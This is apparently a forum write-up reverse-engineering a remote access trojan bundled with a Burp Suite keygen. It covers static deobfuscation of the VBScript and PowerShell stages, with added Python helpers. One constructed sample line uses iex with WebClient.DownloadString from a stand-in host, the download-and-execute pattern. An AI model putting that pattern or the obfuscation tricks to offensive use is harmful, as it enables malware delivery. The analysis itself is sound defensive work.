DISCLAIMER: The following post contains a virus sample. If you decide to mess with it you do so at your own risk. Do not go running it on your computer; at the very least use a VM.

Some random new "user" called posted some files on the forums multiple times (after being deleted by mods) claiming it was a keygen for Burp Suite. Many members of these forums were suspicious of it being malware. I, along with and (please let me know if I missed anyone), decided to reverse engineer it to see if it is.

Surprisingly, as well as containing a remote access trojan (RAT), it actually contains a working keygen. As such, for legal reasons I have not included a link to the original file. The following is a writeup of the analysis of the RAT.

The keygen comes with a file called virus.txt which contains what appears to be a link to a VirusTotal scan of the keygen jarfile. However, the hash on VirusTotal is different to the actual file, indicating that it is a scan of a different file. (NOTE: iirc when I originally visited the page all the scans were clean and the file name matched the file burp-loader-keygen1.7.31.jar.) A scan link bundled with a sample proves nothing about that sample; hash the file you actually have and look that hash up yourself.

Jars are stored as zip files, so we can extract the jar with unzip:

```
> cp burp-loader-keygen1.7.31.jar burp-loader-keygen1.7.31.zip
```

There is a class file which can be decompiled; I will use jad, which is installed on Kali. Here is the important part of the decompiled Java code:

Before this part is a base64 encoding of another jarfile containing the keygen. The decode function decodes the base64 and writes it to a file called Data.jar. This section of code contains PowerShell commands to download and run this PowerShell script. Let's download that code and have a look.

This drops two more files into a newly made C:\ProgramData\WindowsNT directory. It then runs the Visual Basic script (co.vbs), so let's look at that first.

Here we have obfuscated Visual Basic code. The easiest method to deobfuscate is to replace the part of the code that executes with something that prints (this may not work in all cases, but it is a very useful technique). Here, clearly, the part that executes the deobfuscated code is the EVAL(EXECUTE(www)) (circled). (What this file is actually doing is splitting the long string at every *, evaluating the expressions in the resulting list, turning the results of the math expressions into characters, and finally running the string produced by concatenating those characters.)

To print the string instead of executing it, we can replace the EVAL(EXECUTE( call with one that prints.

What this does is run the other downloaded file, co.js (saved as WindowsNT.ini), in PowerShell. This file is large, so I have uploaded it here. I gzipped and base64-encoded the file to make it upload nicely; to read it you should run

```
cat co.64 | base64 -d | gunzip > co.ps1
```

I have also renamed co.js to co.ps1 to make the.

Iex (an alias for Invoke-Expression) is a function that evaluates PowerShell code, so we need to replace it with Write-Output to print the code instead, then run the file. Note that this only neutralises the final stage: everything else in the script still runs, so only do this inside the isolated VM. I was running in a new virtual machine, so I had to allow untrusted PowerShell scripts to execute. After running PowerShell as an administrator:

The beginning of this file looks like this:

We have yet another layer of obfuscation. This time it calls Invoke-Expression instead of iex; replace it with Write-Output. The first thing to notice is that the new file has three sections separated by blank lines. Instead of trying to deobfuscate the whole file at once (like I did), I learnt that it would have been better to split it into 3 smaller files and do them one at a time. I made the mistake of missing the first section and couldn't find some needed code later (this was found by and

We don't have something that looks as nice as Invoke-Expression this time. However, since the execution will be done last, it is most likely that the call will be on one of the ends: the left, with the deobfuscated code as an argument, or the right, with the code piped into its standard input. In this case the left just consists of a bracket, so let's check the rightmost statement after a pipe (circled). Let's see what $PsHOmE $PShOMe 'X' evaluates to:

```
PS E:\burp\burploader> $PsHOmE $PShOMe 'X'
```

After executing there is more obfuscation, so do it again on the new file, replacing ( $eNv:PuBliC $eNv:pUBLiC 'x') at the beginning:

```
PS E:\burp\burploader> $eNv:PuBliC $eNv:pUBLiC 'x'
```
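The first stage above (a jar that is just a zip, with a second jar hidden as a base64 string inside a class) can be pulled apart without executing anything. The following is an added example and not code from the post or from the sample: it builds a constructed stand-in for the loader jar in memory, scans every entry for long base64 runs, keeps the runs that decode to something starting with the ZIP magic `PK\x03\x04`, and lists the entries of the inner jar. The entry names, the `Loader.class` stub and the 100-character run threshold are assumptions made for the demo.

```python
import base64
import binascii
import io
import re
import zipfile

# A base64 run long enough to be a payload rather than a short string constant.
# The threshold is an assumption; the constructed inner jar here is a few hundred bytes.
_B64_RUN = re.compile(rb"[A-Za-z0-9+/]{100,}={0,2}")
ZIP_MAGIC = b"PK\x03\x04"


def find_embedded_zips(data: bytes) -> list:
    """Return (offset, decoded_bytes) for each base64 run that decodes to a ZIP/JAR."""
    hits = []
    for m in _B64_RUN.finditer(data):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # looked like base64 but is not
        if blob.startswith(ZIP_MAGIC):
            hits.append((m.start(), blob))
    return hits


def jar_entries(blob: bytes) -> list:
    """List the entries of an in-memory jar (a jar is just a zip)."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


def carve_outer_jar(outer_jar: bytes) -> dict:
    """Scan every entry of the loader jar; map entry name -> entries of the jar hidden in it."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(outer_jar)) as zf:
        for name in zf.namelist():
            for _offset, blob in find_embedded_zips(zf.read(name)):
                found[name] = jar_entries(blob)
    return found


def _make_jar(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample() -> bytes:
    """Constructed stand-in for the loader jar (not the real burp-loader-keygen1.7.31.jar):
    one pretend class holding the base64 of a second jar, as the post describes."""
    inner = _make_jar({
        "META-INF/MANIFEST.MF": "Manifest-Version: 1.0\nMain-Class: keygen.Main\n",
        "keygen/Main.class": b"\xca\xfe\xba\xbe" + b"\x00" * 28,
    })
    # A real .class keeps the string in its constant pool; the scanner only needs
    # the base64 text to be present as a contiguous run of bytes.
    loader_class = b'static String data = "' + base64.b64encode(inner) + b'";'
    return _make_jar({"Loader.class": loader_class})


if __name__ == "__main__":
    for entry, inner_entries in carve_outer_jar(build_sample()).items():
        print(entry, "contains a jar with", inner_entries)
```

To run this on a real sample, pass `open(path, "rb").read()` to `carve_outer_jar`. One caveat: a `.class` file stores each string constant as modified UTF-8 of at most 65535 bytes, so a very large blob may be split across several constants that the code concatenates at runtime; in that case the runs have to be joined in order, which is why scanning the jad output, as the post does, is often the easier route.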
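The VBScript stage above does two things worth reproducing: the post's trick of swapping the executing wrapper for a printing one, and the actual decoding loop (split the long string at every `*`, evaluate each arithmetic piece, turn each result into a character). The following is an added example, not code from the post or the sample. It reimplements that loop statically in Python, evaluating only arithmetic via the `ast` module so that no VBScript (and no Python `eval`) ever runs, and it rewrites `EVAL(EXECUTE(...))` to `WScript.Echo((...))` the way the post suggests. The sample string and the tiny `co.vbs` stand-in are constructed for the demo and decode to `MsgBox("hi")`; the real payload in the post is far longer.

```python
import ast
import operator
import re

# Arithmetic the obfuscated VBScript uses between the '*' separators.  '*' itself
# cannot appear inside a piece because it is the separator.
_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Div: operator.truediv,        # VBScript '/'  (floating point)
    ast.FloorDiv: operator.floordiv,  # VBScript '\'  (integer division)
    ast.Mod: operator.mod,
    ast.Pow: operator.pow,            # VBScript '^'
}


def _eval_arith(node):
    """Evaluate a parsed arithmetic expression; any other syntax is rejected."""
    if isinstance(node, ast.Expression):
        return _eval_arith(node.body)
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
        return node.value
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        return -_eval_arith(node.operand)
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        return _OPS[type(node.op)](_eval_arith(node.left), _eval_arith(node.right))
    raise ValueError("unsupported syntax: " + ast.dump(node))


def safe_arith(expr: str) -> float:
    """Evaluate one VBScript arithmetic expression without any script interpreter."""
    py = expr.replace("\\", "//").replace("^", "**")  # VBScript operators -> Python
    return _eval_arith(ast.parse(py, mode="eval"))


def decode_star_string(blob: str) -> str:
    """Split at '*', evaluate each piece, and turn each result into a character."""
    out = []
    for piece in blob.split("*"):
        piece = piece.strip()
        if piece:
            out.append(chr(int(round(safe_arith(piece)))))
    return "".join(out)


_EXEC_WRAPPER = re.compile(r"EVAL\s*\(\s*EXECUTE\s*\(", re.IGNORECASE)


def print_instead_of_execute(vbs_source: str) -> str:
    """The post's trick: EVAL(EXECUTE(x)) becomes WScript.Echo((x)), so the decoded
    script is printed instead of run.  Parentheses stay balanced."""
    return _EXEC_WRAPPER.sub("WScript.Echo((", vbs_source)


# Constructed sample (not the real co.vbs): the pieces decode to MsgBox("hi").
SAMPLE_STRING = "70+7*230/2*(200-97)*66*100+11*(240/2)*50-10*17+17*208/2*105*34*-9+50"
SAMPLE_VBS = 'www = decode("' + SAMPLE_STRING + '")\nEVAL(EXECUTE(www))\n'

if __name__ == "__main__":
    print(decode_star_string(SAMPLE_STRING))  # MsgBox("hi")
    print(print_instead_of_execute(SAMPLE_VBS))
```

The static decoder is the safer of the two approaches: the print-swap still runs every other line of the script, whereas `safe_arith` refuses anything that is not a number or one of the listed operators, so a piece that smuggles in a function call raises `ValueError` instead of executing.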
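The `$PsHOmE ... 'X'` and `$eNv:PuBliC ... 'x'` expressions at the end of the post are the usual index-into-a-known-string trick: single characters are picked out of `$PSHome` (`C:\Windows\System32\WindowsPowerShell\v1.0`) and `$env:Public` (`C:\Users\Public`) and joined to spell `iex`. The `[n]` index brackets did not survive in the prompt lines above, so the following added example (not the post's code, nor the sample's) assumes the common `$PSHome[4]+$PSHome[30]+'x'` and `$env:Public[13]+$env:Public[5]+'x'` forms and the default install paths shown in `KNOWN_VARS`. It resolves those indexes statically, folds the `'a'+'b'` chains, looks for the executor at either end (left with the payload as argument, or right after a pipe, exactly the two positions the post checks), and rewrites it to `Write-Output`. Both sample lines are constructed for the demo.

```python
import re

# What the indexed variables hold on a default Windows install.  Assumed for this
# example; confirm on the analysis VM with `$PSHome` and `$env:Public` first.
KNOWN_VARS = {
    "pshome": r"C:\Windows\System32\WindowsPowerShell\v1.0",
    "env:public": r"C:\Users\Public",
}

EXECUTORS = {"iex", "invoke-expression"}

_INDEX_RE = re.compile(r"\$(?P<var>[A-Za-z_][A-Za-z0-9_:]*)\[(?P<idx>-?\d+)\]")
_CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# &('name') or .('name'): the call-operator forms the obfuscator emits.
_CALL_RE = re.compile(r"[&.]\(\s*'([^']*)'\s*\)")


def resolve_indexes(ps: str) -> str:
    """Replace $Var[n] with the quoted character it selects (names are case-insensitive)."""
    def repl(m):
        var = m.group("var").lower()
        if var not in KNOWN_VARS:
            return m.group(0)  # unknown variable: leave it for manual review
        return "'" + KNOWN_VARS[var][int(m.group("idx"))] + "'"
    return _INDEX_RE.sub(repl, ps)


def fold_concats(ps: str) -> str:
    """Collapse 'a'+'b'+'c' chains into 'abc' until nothing changes."""
    prev = None
    while prev != ps:
        prev, ps = ps, _CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", ps)
    return ps


def find_executors(ps: str) -> list:
    """Call-operator targets that resolve to iex / Invoke-Expression, as written."""
    folded = fold_concats(resolve_indexes(ps))
    return [m.group(1) for m in _CALL_RE.finditer(folded)
            if m.group(1).lower() in EXECUTORS]


def neuter(ps: str) -> str:
    """The post's technique applied statically: each resolved executor becomes
    Write-Output, so the next layer is printed rather than run."""
    folded = fold_concats(resolve_indexes(ps))
    folded = _CALL_RE.sub(
        lambda m: "Write-Output" if m.group(1).lower() in EXECUTORS else m.group(0), folded)
    # Plain calls too (the layer that used iex / Invoke-Expression directly).
    return re.sub(r"(?i)\b(iex|invoke-expression)\b", "Write-Output", folded)


# Constructed samples (not the real co.ps1): executor on the left with the payload
# as its argument, and executor on the right with the payload piped into it.
SAMPLE_LEFT = ("&( $eNv:PuBliC[13]+$eNv:pUBLiC[5]+'x') "
               "( (New-Object Net.WebClient).DownloadString('http://example.invalid/s') )")
SAMPLE_RIGHT = ("( [char[]](0x57,0x72,0x69,0x74,0x65) -join '' ) "
                "| .( $PsHOmE[4]+$PShOMe[30]+'X')")

if __name__ == "__main__":
    for sample in (SAMPLE_LEFT, SAMPLE_RIGHT):
        print(find_executors(sample), "->", neuter(sample))
```

The final plain-text substitution is deliberately blunt: it will also rewrite the word `iex` inside a string literal, so diff the output against the input before running the neutered file. As with the post's own approach, the rest of the script still executes, so the result is only ever run inside the isolated VM.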